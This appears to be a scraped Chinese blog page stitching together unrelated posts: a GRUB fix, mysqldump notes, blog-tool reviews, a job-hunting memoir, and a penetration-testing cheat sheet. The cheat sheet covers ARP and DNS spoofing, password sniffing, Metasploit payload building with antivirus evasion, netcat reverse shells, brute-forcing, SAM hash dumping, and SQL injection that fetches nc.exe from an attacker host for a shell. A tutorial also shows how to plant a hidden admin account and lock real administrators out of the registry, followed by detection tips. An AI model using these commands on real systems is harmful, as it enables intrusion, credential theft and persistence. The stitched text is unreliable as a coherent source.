检查UUID

ls -l /dev/disk/by-uuid/

重新生成GRUB

grub-mkconfig -o /boot/grub/grub.cfg

或者用此命令

update-grub

附上/boot/grub/grub.cfg的部分内容，其中8AFCE93BFCE92265即是我们修改的东西，

menuentry "Windows 7 (loader) (on /dev/sda1)" –class windows –class os {
insmod part_msdos
insmod ntfs
set root=’(/dev/sda,msdos1)’
search –no-floppy –fs-uuid –set=root 8AFCE93BFCE92265
chainloader +1
}

Related Posts

• 破解Linux系统密码就用强大的john(0)
• 用linux下迅雷离线下载(2)
• youtube-dl的汉化使用说明(0)
• 如何选择VPS虚拟主机的系统以及版本(2)
• linux下批量下载youtube视频(3)
• TeamViewer for Linux(2)
• 关于Linux使用的真实内存(0)
• linux下GUI图形界面白盒测试工具(0)
• 用windows7的bcdedit引导GRUB4DOS续(0)

banner获取:
nc ip port  检测端口是否打开。
telnet ip port  检测端口是否打开。
wget ip  下载主页。
cat index.html | more  显示主页代码。
q   退出。
windows枚举
nmap -sS -p 139,445 ip  扫描windows。
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP  检测netbios。
smbgetserverinfo -i targetIP  扫描name,os,组。
smbdumpusers -i targetIP  列出用户。
smbclient -L //targetIP  列出共享。
使用windows:
net use \\ip\ipc$ "" /u:""  开启空会话。
net view \\ip               显示共享信息。
smbclient:
smbclient -L hostName -I targetIP 枚举共享。
smbclient -L hostName/share -U "" 用空用户连接。
smbclient -L hostName -I targetIP -U admin普通用户连接。
rpcclient:
rpcclient targetIP -U “”打开一个空会话。
netshareenum  枚举共享。
enumdomusers  枚举用户。
lsaenumsid    枚举域SID。
queryuser RID 查询用户信息。
createdomuser 创建用户访问。
ARP欺骗:
ettercap:
nano /usr/local/etc/etter.conf配置文件
Sniff > Unified sniffing > Network interface: eth0 > OK  设置抓包的网卡
Hosts > Scan for hosts (do this two times)扫描网段的主机
Hosts > Hosts list 显示主机列表
Select the default gateway > Add to Target 1 添加主机
Select the target > Add to Target 2 添加主机
Mitm > Arp poisoning > Sniff remote connections > OK  设置ARP攻击
Start > Start sniffing 开始攻击
dsniff -i eth0 监听网卡窃听登录用户密码
urlsnarf -i eth0 嗅探http请求
msgsnarf -i eth0 嗅探聊天软件的聊天内容
driftnet -i eth0 网络管理嗅探图片，音频。
dns欺骗:
nano /usr/local/share/ettercap/etter.dns编辑配置文件
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
Start > Start sniffing 开始攻击
Exploits漏洞利用:
cd /pentest/exploits/exploit-db 进入目录
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
cat exploit | grep "#include"检查运行环境
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码
Metasploit:
svn update 升级
./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助
show <option> 显示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options  显示选项
set <OPTION NAME> <option> 设置选项
show payloads 显示装置
set PAYLOAD <payload name> 设置装置
show options  显示选项
set <OPTION NAME> <option> 设置选项
show targets  显示目标(os版本)
set TARGET <target number> 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
sessions -i <ID> 选择会话
sessions -k <ID> 结束会话
<ctrl> z  把会话放到后台
<ctrl> c  结束会话
jobs   列出漏洞运行工作
jobs -K  结束一个漏洞运行工作
show auxiliary 显示辅助模块
use <auxiliary name> 使用辅助模块
set <OPTION NAME> <option> 设置选项
run  运行模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall:  bind shell正向
Target behind firewall:  reverse shell反向
Meterpreter衔接不懂dos的可以用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
自动化攻击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字符接口攻击流程:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
做木马后门等:
./msfpayload <payload> <variable=value> <output type>
S        summary and options of payload
C        C language
P        Perl
y         Ruby
R        Raw, allows payload to be piped into msfencode and other tools
J         JavaScript
X        Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
编码处理就是做免杀:
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -e PexFnstenvMor -t c
入侵后在windows下添加管理员用户:
hostname 查看主机名
net users 查看用户
net user 用户 密码 /add 添加用户
net localgroup 查看工作组
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用户加入管理员组
TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下载
netcat瑞士军刀
attacker:  10.1.1.1
target:  10.1.1.2
nc -v -z 10.1.1.2 1-1024 端口扫描
target:  nc -lvp 4444 聊天设置(服务)
attacker:  nc -v 10.1.1.2 4444 聊天设置(客户)
target:  nc -lvp 4444 > output.txt传输文件(接受)
attacker:  nc -v 10.1.1.2 4444 < test.txt传输文件(发送)
target:  nc -lvp 4444 -e cmd.exe  Bind shell。
attacker:  nc -v 10.1.1.2 4444
target:nc -lvp 4444  Reverse shell。
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
密码
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示个数(30多万个)    
暴力:
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
hydra -l muts -P words -v targetIP pop3 攻击pop3
hydra -P words -v targetIP snmp 攻击snmp
攻击microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r www.target.com –accept=pdf 下载pdf文档
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM文件(windows下的密码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWS\system32> pwdump \\127.0.0.1
john破解密码:
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
彩虹表:
rcrack *.rt -f hash.txt
本地修改密码:
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1 挂载c盘
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件
直接修改sam文件:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password.  *
Do you really wish to change it?  y
Write hive files?  y
unmount /mnt/sda1
reboot
SQL 注入
nmap -sS -p 1521 targetIP 扫描oracle
nmap -sS -p T:1433,U:1434 targetIP 扫描mssql
‘ or 1=1–验证旁路
列举表名:
‘ having 1=1–
‘ group by table having 1=1–
‘ group by table, table2 having 1=1–
‘ group by table, table2, table3 having 1=1–
列举列类型:
union select sum(column) from table —
union select sum(column2) from table —
添加数据:
‘ ; insert into table values(‘value’,'value2′,’value3′)–
MSSQL存储程序:
输出数据库中备案信息到一个html文件,您可以查看与一个浏览器。
‘ ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; –  www.target.com/test.html
运行ipconfig在浏览器查看信息。
‘ or 1=1; exec master..xp_cmdshell ‘ "ipconfig" > c:\Inetpub\wwwroot\test.txt’ ;– www.target.com/test.txt
上传后门。
‘ or 1=1; exec master..xp_cmdshell ‘ "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe’ ; —
攻击者:  nc -lvp 53

Related Posts

• 玩转Windows系统的账户隐藏(0)
• 百度被黑真相(0)

你可以先尝试以下2个方法：

1， mysqldump 备份的时候使用 –extended-insert=false 参数。
原理如下：
使用MySqldump命令导出数据时的注意
    在使用Mysql做基础数据库时,由于需要将库B的数据导入库A,而A,B库又包含大量相同的数据,需要使用mysqldump导出脚本.
   通常的命令会是
   1. mysqldump -t ‘dbName’ > ‘scriptName.sql’
   2. mysql -f ‘dbName’ < ‘scriptName.sql’
   而使用如下命令导入到A库时不会成功,现象是报出几个Duplicate key error后就完毕了,并未将其余正确的数据插入到A库中.
    捣鼓了好一会,发现在使用mysqldump导出的脚本命令中,insert语句采用是multiline insert synax.而不是采用single insert synax.原来是这个问题. 多行的插入语法在第一个主健重复错误后就不执行后续的对应表的插入语句了.
   于是再加参数 –extended-insert=false,完整的命令是
   mysqldump –extended-insert=false dbname > scriptname.sql

2，手工把表里头username中存在重复的值删除！

使用数据库工具 Navicat 之类的，执行查询：

Select username,Count(*) From cdb_members Group By username Having Count(*) > 1

结果中就能显示出表中存在重复的字段, 你会看到2个或者多个完全一模一样重复的用户名。

干掉其中一行的记录，保存后再导出数据库。

但 我个人强烈推荐,，最重要一点！备份的时候，把表结构跟数据分开！！

以下是 mysqldump 的一些使用参数

备份数据库
#mysqldump 数据库名 >数据库备份名

#mysqldump -A -u用户名 -p密码 数据库名>数据库备份名

#mysqldump -d -A –add-drop-table -uroot -p >xxx.sql

1.导出结构不导出数据

mysqldump -d 数据库名 -uroot -p > xxx.sql

2.导出数据不导出结构

mysqldump -t 数据库名 -uroot -p > xxx.sql

3.导出数据和表结构

mysqldump 数据库名 -uroot -p > xxx.sql

4.导出特定表的结构

mysqldump -uroot -p -B数据库名 –table 表名 > xxx.sql

#mysqldump [OPTIONS] database [tables]

mysqldump支持下列选项：

–add-locks  
在每个表导出之前增加LOCK TABLES并且之后UNLOCK TABLE。(为了使得更快地插入到MySQL)。  
–add-drop-table  
在每个create语句之前增加一个drop table。  
–allow-keywords  
允许创建是关键词的列名字。这由表名前缀于每个列名做到。  
-c, –complete-insert  
使用完整的insert语句(用列名字)。  
-C, –compress  
如果客户和服务器均支持压缩，压缩两者间所有的信息。  
–delayed  
用INSERT DELAYED命令插入行。  
-e, –extended-insert  
使用全新多行INSERT语法。（给出更紧缩并且更快的插入语句）  
-#, –debug[=option_string]  
跟踪程序的使用(为了调试)。  
–help  
显示一条帮助消息并且退出。  
–fields-terminated-by=…  
–fields-enclosed-by=…  
–fields-optionally-enclosed-by=…  
–fields-escaped-by=…  
–fields-terminated-by=…  
这些选择与-T选择一起使用，并且有相应的LOAD DATA INFILE子句相同的含义。  
LOAD DATA INFILE语法。  
-F, –flush-logs  
在开始导出前，洗掉在MySQL服务器中的日志文件。  
-f, –force,  
即使我们在一个表导出期间得到一个SQL错误，继续。  
-h, –host=..  
从命名的主机上的MySQL服务器导出数据。缺省主机是localhost。  
-l, –lock-tables.  
为开始导出锁定所有表。  
-t, –no-create-info  
不写入表创建信息(CREATE TABLE语句）  
-d, –no-data  
不写入表的任何行信息。如果你只想得到一个表的结构的导出，这是很有用的！  
–opt  
同–quick –add-drop-table –add-locks –extended-insert –lock-tables。  
应该给你为读入一个MySQL服务器的尽可能最快的导出。  
-pyour_pass, –password[=your_pass]  
与服务器连接时使用的口令。如果你不指定“=your_pass”部分，mysqldump需要来自终端的口令。  
-P port_num, –port=port_num  
与一台主机连接时使用的TCP/IP端口号。（这用于连接到localhost以外的主机，因为它使用 Unix套接字。）  
-q, –quick  
不缓冲查询，直接导出至stdout；使用mysql_use_result()做它。  
-S /path/to/socket, –socket=/path/to/socket  
与localhost连接时（它是缺省主机)使用的套接字文件。  
-T, –tab=path-to-some-directory  
对于每个给定的表，创建一个table_name.sql文件，它包含SQL CREATE 命令，和一个table_name.txt文件，它包含数据。注意：这只有在mysqldump运行在mysqld守护进程运行的同一台机器上的时候才工作。.txt文件的格式根据–fields-xxx和 –lines–xxx选项来定。  
-u user_name, –user=user_name  
与服务器连接时，MySQL使用的用户名。缺省值是你的Unix登录名。  
-O var=option, –set-variable var=option设置一个变量的值。可能的变量被列在下面。  
-v, –verbose  
冗长模式。打印出程序所做的更多的信息。  
-V, –version  
打印版本信息并且退出。  
-w, –where=’where-condition’  
只导出被选择了的记录；注意引号是强制的！  
"–where=user=’jimf’" "-wuserid>1" "-wuserid<1"

导入数据：

由于mysqldump导出的是完整的SQL语句，所以用mysql客户程序很容易就能把数据导入了：

#mysql 数据库名 < 文件名

#source /tmp/xxx.sql

原文地址:http://www.oschina.net/discuss/thread/2449

Related Posts

• 0

Windows Live Writer

这个工具一直是我的最爱以及优先选择，而微软对此也升级改版了好几次，现在的功能非常的强大并且超级实用。我简单介绍几个我认为比较有特色的地方：

1.图片的自由编辑

这个功能很实用，你可以把图片按照文章排版要求进行任意的自定义，比如图片大小、剪裁、水印、ALT优化、位置定义以及多种特效等。基本上可以实现“完美”要求，之前就有很多朋友还向我咨询如何像我在博客文章中插图片呢，其实秘密是我使用了Windows Live Writer。

2.文章实时保存

当写文章的时候遇到停电、程序崩溃、又或者别的情况怎么办？我是遇到过，写了一大篇结果是忘记保存全部完完，对此以前在博客中承诺过要写的文章到现在还有些没有写，有一点文章就可能是遇到了这个问题，所以开启工具中的实时保存功能非常有必要的。

3.强大编辑器功能

文字的字体、颜色、大小、下滑线、删除线、标题、超级链接等等一应俱全，就如使用words编辑文件一样。

4.SEO功能

文章分类的自由定义与选择，tags与描述这个功能与Wordpress的All in one Seo插件完美融合，自定义文章发布时间，ping、文章链接以及trackack自定义。

5.可扩展

这个功能我以前就添加过一些小特效，别的没有尝试过，看官方介绍是可以添加额外的插件实现一些特殊需求。

此外还有比如同步博客的外观功能、可见模式编辑以及代码模式编辑自选、多账号和多平台博客、代理使用、英文拼写以及字数检查等功能，好了，不多介绍了，有兴趣的朋友自己亲自测试下就知道了。

下载地址：http://explore.live.com/windows-live-writer

Zoundry Raven

这个软件也有一定的历史了，是Zoundry公司很早前开发的，早期版叫做zBlog Writer。相比Windows Live Writer的强大功能Zoundry Raven更显得非常的小巧，属于小众软件，当然也有其特色。

1.支持中文

原来版本是安装后在界面上才可以选择语言，现在下载新版本就不需要那么麻烦了，下载后在安装的第一步就会有提示语言的选择。

2.支持导入Windows Live Writer的数据

这个功能让我开始有点意外，如果电脑安装了Windows Live Writer谁还会转到Zoundry Raven呢？不过当你看到下面这个功能的话你就会理解了。

3.支持portable

Raven最强大的地方在于它可以portable，也就是说，你可以把Raven安装在移动硬盘里或者闪存盘里，带着闪存盘你脱离电脑也可以到处写了。在安装的时候会有这个选项Raven2Go，勾选即可。

4.支持博客平台更多点，对系统要求更低点

以前我用我那笔记本安装Windows Live Writer搞了好几次也没搞定，但是用Raven就不会出现这个的问题，所以说Raven属于小众软件是有其中的道理的，这个你懂的！

下载地址：http://www.zoundryraven.com/download.html

如果在使用过程中遇到问题可以在下面的评论上留言，在力所能及的范围内会给予帮助的。

Tip（中文博客使用Windows Live Writer小技巧：在添加tags的时候多个tags之间要用英文输入法下面的半角符号，中文文章要自己手工复制点内容到描述里面，因为中文文章seo插件不怎么会自动截取描述。）

转载自Tuixy博客

Related Posts

• 0

不过,终于还是解决了,特记录一下.

到win7codecs下载它的安装包,再下载一个win7codecsX64版本,这两个必须装的…安装好后打开potplayer,进入选项-滤镜-滤镜优先权-添加系统解码器-选择LAV Splitter Source-优先顺序选择强制使用即可.不过播放某些RM可能会出现乱码,既然不卡了那也就算了.

OVER

Related Posts

• 绝不能让老妈看到,学会我就疯了(0)

一、“命令提示符”中的阴谋

其实，制作系统隐藏账户并不是十分高深的技术，利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。

点击“开始”→“运行”，输入“CMD”运行“命令提示符”，输入“net user piao$Content$nbsp;123456 /add”，回车，成功后会显示“命令成功完成”。接着输入“net localgroup administrators piao$Content$nbsp;/add”回车，这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”，密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。

我们来看看隐藏账户的建立是否成功。在“命令提示符”中输入查看系统账户的命令“net user”，回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。接着让我们进入控制面板的 “管理工具”，打开其中的“计算机”，查看其中的“本地用户和组”，在“用户”一项中，我们建立的隐藏账户“piao$”暴露无疑。

可以总结得出的结论是：这种方法只能将账户在“命令提示符”中进行隐藏，而对于“计算机管理”则无能为力。因此这种隐藏账户的方法并不是很实用，只对那些粗心的管理员有效，是一种入门级的系统账户隐藏技术。

二、在“注册表”中玩转账户隐藏

从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显，很容易暴露自己。那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的，而这一切只需要我们在“注册表”中进行一番小小的设置，就可以让系统账户在两者中完全蒸发。

1、峰回路转，给管理员注册表操作权限

在注册表中对系统账户的键值进行操作，需要到“HKEY_LOCAL_MACHINESAMSAM”处进行修改，但是当我们来到该处时，会发现无法展开该处所在的键值。这是因为系统默认对系统管理员给予“写入”和“读取控制”权限，没有给予修改权限，因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。

点击“开始”→“运行”，输入 “regedt32.exe”后回车，随后会弹出另一个“注册表编辑器”，和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解，以下简称regedt32.exe)。在regedt32.exe中来到“HKEY_LOCAL_MACHINESAMSAM”处，点击 “安全”菜单→“权限”，在弹出的“SAM的权限”编辑窗口中选中“administrators”账户，在下方的权限设置处勾选“完全控制”，完成后点击“确定”即可。然后我们切换回“注册表编辑器”，可以发现“HKEY_LOCAL_MACHINESAMSAM”下面的键值都可以展开了。

提示：上文中提到的方法只适用于Windows NT/2000系统。在Windows XP系统中，对于权限的操作可以直接在注册表中进行，方法为选中需要设置权限的项，点击右键，选择“权限”即可。

2、偷梁换柱，将隐藏账户替换为管理员

成功得到注册表操作权限后，我们就可以正式开始隐藏账户的制作了。来到注册表编辑器的 “HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”处，当前系统中所有存在的账户都会在这里显示，当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”，在右边显示的键值中的“类型”一项显示为0x3e9，向上来到 “HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”处，可以找到“000003E9”这一项，这两者是相互对应的，隐藏账户“piao$”的所有信息都在“000003E9”这一项中。同样的，我们可以找到“administrator”账户所对应的项为 “000001F4”。 将“piao$”的键值导出为“piao$.reg”，同时将“000003E9”和“000001F4”项的F键值分别导出为 user.reg，admin.reg。用“记事本”打开admin.reg，将其中“F”值后面的内容复制下来，替换user.reg中的“F”值内容，完成后保存。接下来进入“命令提示符”，输入“net user piao$Content$nbsp;/del”将我们建立的隐藏账户删除。最后，将piao$.reg和user.reg导入注册表，至此，隐藏账户制作完成。

3、过河拆桥，切断删除隐藏账户的途径

虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了，但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户，那么如何才能让我们的隐藏账户坚如磐石呢?

打开“regedt32.exe”，来到“HKEY_LOCAL_MACHINESAMSAM”处，设置“SAM”项的权限，将 “administrators”所拥有的权限全部取消即可。当真正的管理员想对“HKEY_LOCAL_MACHINESAMSAM”下面的项进行操作的时候将会发生错误，而且无法通过“regedt32.exe”再次赋予权限。这样没有经验的管理员即使发现了系统中的隐藏账户，也是无可奈何的。

三、专用工具，使账户隐藏一步到位

虽然按照上面的方法可以很好得隐藏账户，但是操作显得比较麻烦，并不适合新手，而且对注册表进行操作危险性太高，很容易造成系统崩溃。因此我们可以借助专门的账户隐藏工具来进行隐藏工作，使隐藏账户不再困难，只需要一个命令就可以搞定。

我们需要利用的这款工具名叫“HideAdmin”，下载下来后解压到c盘。然后运行“命令提示符”，输入“HideAdmin piao$Content$nbsp;123456”即可，如果显示“Create a hiden Administrator piao$Content$nbsp;Successed!”，则表示我们已经成功建立一个账户名为piao$，密码为123456的隐藏账户。利用这款工具建立的账户隐藏效果和上文中修改注册表的效果是一样的。

四、把“隐藏账户”请出系统

隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后，再对相应的防范技术作一个了解，把隐藏账户彻底请出系统

1、添加“$”符号型隐藏账户

对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后，会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入 “net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦，可以直接打开“计算机管理”进行查看，添加“$”符号的账户是无法在这里隐藏的。

2、修改注册表型隐藏账户

由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的，因此可以到注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames”，把这里存在的账户和“计算机管理”中存在的账户进行比较，多出来的账户就是隐藏账户了。想要删除它也很简单，直接删除以隐藏账户命名的项即可。

3、无法看到名称的隐藏账户

如果黑客制作了一个修改注册表型隐藏账户，在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的，甚至无法知道黑客建立的隐藏账户名称。不过世事没有绝对，我们可以借助“组策略”的帮助，让黑客无法通过隐藏账户登陆。点击“开始”→“运行”，输入 “gpedit.msc”运行“组策略”，依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”，双击右边的“审核策略更改”，在弹出的设置窗口中勾选“成功”，然后点“确定”。对“审核登陆事件” 和“审核过程追踪”进行相同的设置。

4、开启登陆事件审核功能

进行登陆审核后，可以对任何账户的登陆操作进行记录，包括隐藏账户，这样我们就可以通过“计算机管理”中的“事件查看器”准确得知隐藏账户的名称，甚至黑客登陆的时间。即使黑客将所有的登陆日志删除，系统还会记录是哪个账户删除了系统日志，这样黑客的隐藏账户就暴露无疑了。

5、通过事件查看器找到隐藏帐户

得知隐藏账户的名称后就好办了，但是我们仍然不能删除这个隐藏账户，因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效，黑客无法再用这个隐藏账户登陆。

本文转自Hollywood Ruins

Related Posts

• 一些入侵中常用的命令(1)
• 百度被黑真相(0)
• Windows 7系统里的上帝模式(0)
• 用windows7的bcdedit引导GRUB4DOS续(0)

PS: 写这些不是为了晒幸福（自己现在很不幸福），也不是为了晒经历；希望能分享自己的经历，认识更多的朋友，如果对提到的分析还感兴趣，我们可以相互学习。现在在研究人人网，大家一起来做吧。我认为做什么事不重要，关键是一起做事的志同道合的人，关键是几年后这些人还能不能一同默契的合作。
caolixiang@gmail.com QQ:568108047

（一）
百度三面后的第二天，接到了赶集网面试的通知。除了大嘴姚晨的广告，对这个公司毫无了解。
由于到得比较早，细心观察了一下。“做人要正，做事传奇”、“心胸坦荡，有抱怨向上走”这些信条很吸引我。
面试我的不是HR，是销售部的运营经理——GL，也是我以后的Boss。我第一次打领带穿衬衫，他让我不要紧张。面试过程很轻松，基本上是他问我答，他否定之，然后告诉我他的理由。那天完全被震撼了，后来公司内临时的会议打断了面试，于是他和我约定的第二次面试的时间。

步行到软件园东站时，胃开始剧烈的疼痛，从小到大感到很大的压力时我都会这样。我一路上慢慢思考，觉得自己菜得一米，有必要系统的学习一下，而且这个公司适合我。
第二次面试，还是他问我答，他否定。我一如既往地被鄙视，然后懊悔自己考虑不成熟就开口的行为。我也知道了数据运营的职责，了解销售数据，制定销售计划，确保公司年度计划的完成。在GL的眼中，运营做得多是监控，监控整个销售团队的绩效。他告诉我一个模型——针对需求去寻找方法，然后建立反馈流不停地改进这个闭循环。面试的最后，他问了我时间安排和态度，他说工作可能和我想得大相径庭，可能枯燥、无聊，但是正是因为枯燥、无聊才会使得工作更高效。
GL让我回去等消息，一周后会有答复。
我回去洗洗就睡了。一周过去了，没有一点消息，我不知道他的电话，也觉得打过去冒失。于是在百度乖乖呆着，两周后实在坐不住了，我觉得自己该做些什么。记得GL说过，房产业务是赶集网的支柱，于是我决定从这个点入手，通过房产中介去了解赶集网的业务。
在苏州街，我开始了调查。一家家中介问，刚开始什么都不知道，只好边问边学。我告诉中介，我来自赶集网运营部，希望了解他们的反馈，以便更好地改进工作。
从付费端口、竞价积分、用户界面、上户量这些方面，我逐步还原了中介眼中的赶集网房产频道。问题很大，埋怨声很多，后来我问的问题也更有针对性，从他们口中我还得到一些信息：我们的竞争对手58同城，搜房帮，安居客；我们的地毯式广告轰炸等等。
第一天一共刷了24家中介公司，并且答应他们一周后过来收集反馈，晚上做了统计表。第二天，我决定扮演58同城的工作人员，开始在知春路一带刷中介。
中介们并没有埋怨58同城的业务和费用，他们认为58收费合理，上户量较好，各个区域经理认真负责，定时会到店中了解情况。而对赶集网，他们的打分仍然不高，诟病的内容与苏州街一带基本相同。中宇慧通的店长胡泊先生和我聊得很开心，一个劲拉我入伙，要我和他一起搞中介，搞贷款。后来当然也经常去店里找他玩~
第三天，我决定了解赶集网的广告效果。随机做5趟公交，3趟全程的地铁。记录赶集网广告的播放情况，频度，每一次都用秒表卡时间。回来后把这三天的工作做了一个总结，得出了一些结论。
首先，赶集网的地毯式广告取得了很好的效果，对市民的曝光率几乎是100%，如果你乘坐地铁大于5站，很不幸，你会被轰炸3次（7点新闻时段除外）；如果你乘坐公交3.7站，同样很不幸，你会被轰炸一次。在巨额广告投入的影响之下，赶集网全线产品开始涨价，这种涨价行为也招致了顾客的不满。其次，赶集网过度进行市场开发，忽略了可赢利性客户的关系管理和维护，页面改版并没有取得预期效果，反而增加了用户的学习成本；取消竞价积分赠送改用现金返还，遭致了顾客的反感……
第二周周二到第三极创新工场参加了另一个面试，磊友手机游戏平台的项目经理。一二面连在一起，“工头”认为我各方面都可以胜任PM，而且我似乎是他们的救命稻草。“工头”了解了我的年龄后觉得我太早熟了，这样活得辛苦。最后，我把他拒了，心中除了赶集网似乎什么都没有，包括在了快一周的百度。
周三，我到苏州街收集反馈，好几个人都认识我了。在二十一世纪不动产里，一个人木讷地看着我，我也很疑惑，他一直跟着我到了外面。他要检查我的工牌，我说我没有，他问我上司是谁，我说我不知道。他急了，说我凭什么冒充赶集网的人，这件事他非解决不可。最后他让我跟着他到了京东提货点，一边坐着，一边骂我。我一点都生气不起来，首先我把玩笑开大了，我做的调查没有得到授权，其次我通过调查了解了许多内部价格。但我很疑惑，到京东提货也是赶集网工作人员的职责吗？
当天晚上11点，我接到了GL的电话。大意是这件事我做得很棒，出乎他的意料。因为我的事情公司领导在内部会议时炸开了。GL让我准备一下，第二天销售VP要见我，一切看我的。
于是我开始打印表格、报告，连夜写一份总结。至于百度的工作，我决定先辞了。
（二）
第二天，GL把我带到了销售总监的办公室。一台Mac，一套煮咖啡的设备还有一个白板（后来看到的，当时吓傻了O(∩_∩)O）。
总监YT坐在桌子的另一侧，靠着椅子。他问我为什么要做这些调查，我说我想进这个公司；他又问我是什么学校什么专业的。
他知道了我是北邮计算机专业后，态度缓和了很多，他告诉我他也是学计算机的，在天津大学，后来转了销售。他说，技术转销售是一种取舍，可能再也回不去了，我现在可以做这个决定吗？我想了一下，告诉他基本可以，最后他问了我以后的职业规划。轮询后，我把报告交给了YT，他看了一遍，然后让我谈谈客户满意度为何重要。
YT出了总监室，然后外面传来了叫骂声，房产部的人被训了，我在里面也心惊胆寒。GL一直没有和我说话，专心地做他的Excel表格，就这样熬了二十多分钟。
YT回来时，决定给我安排到运营中心，让GL通知人事部的人去办。GL说他亲自办，后来才知道这个部门不招实习生，这个位置是YT争取过来的。
第一天下午做的事是了解赶集网的产品和业务，到了培训部那边听了一阵子客户种类区分，然后开始记录资料上的数字，包括访问量、PV、各时段峰值。
月底，周围人都很忙，第一周我算是比较清闲和自由。浏览赶集网每一个频道，看看《客户关系管理》也顺便学习Excel。
第二周，GL忙完了4月计划，抽了一天晚上给我开小灶，一同参与的还有负责市场推广的某姐姐。小培训在总监室里进行。首先他介绍了什么是运营，他认为运营是渠道管理。赶集网是一个社会媒体，也是一个广告公司，运营的职责是优化各项流程，提高流量的变现能力。他给我们恶补了网络广告的形式和发展历史，第一类广告——CPM是按照每千人浏览计费的，现在门户网站等还在用这种模式；第二类广告——CPC，按用户点击计费，百度推广，竞价排名后的实际点击干得就是这档子事，竞价积分就是通过改变绝对和相对位置使愿意出高价钱的公司或个人可以买到用户的点击（流量），流量到现金的转化能力的提升是运营需要关注的；第三类广告——CPA，按照用户的实际行为付费，比如赶集网的PPC（电话商机），赶集网提供对外号码给出资人，出资人需要向账户内充钱，当用户拨打号码后，赶集网系统会进行呼叫转移，同时系统开始录音。每一个有效电话（完成交易）的基本价格是5元，当然有些频道可以炒到700元以上。
GL还介绍了他的模型，通过客户、产品和销售人员三条主线分析公司盈利额，三条主线殊途同归但是展示了三个不同的角度，分析过程中可以解决诸多问题。
乱入的YT把我拦住，我让拿着白板笔给他重复一遍主要内容，于是只好上去写。他做了一个简短的总结，运营就是开源节流：开源就是提高流量的变现能力，节流就是通过优化流程，降低成本。
我们几个人一起离开公司，一直到了西二旗城铁。路过了百度大厦，灯火依然璀璨。GL说，他的上一个东家也是百度，做的工作是活动策划和数据运营，YT没有多说话。后来知道，YT曾经是百度的传奇人物，负责百度在整个华南区的销售业务，他开辟了华南区市场，从几千万的区域盈利额一直提升到4个亿，在来赶集网之前YT一直呆在深圳。
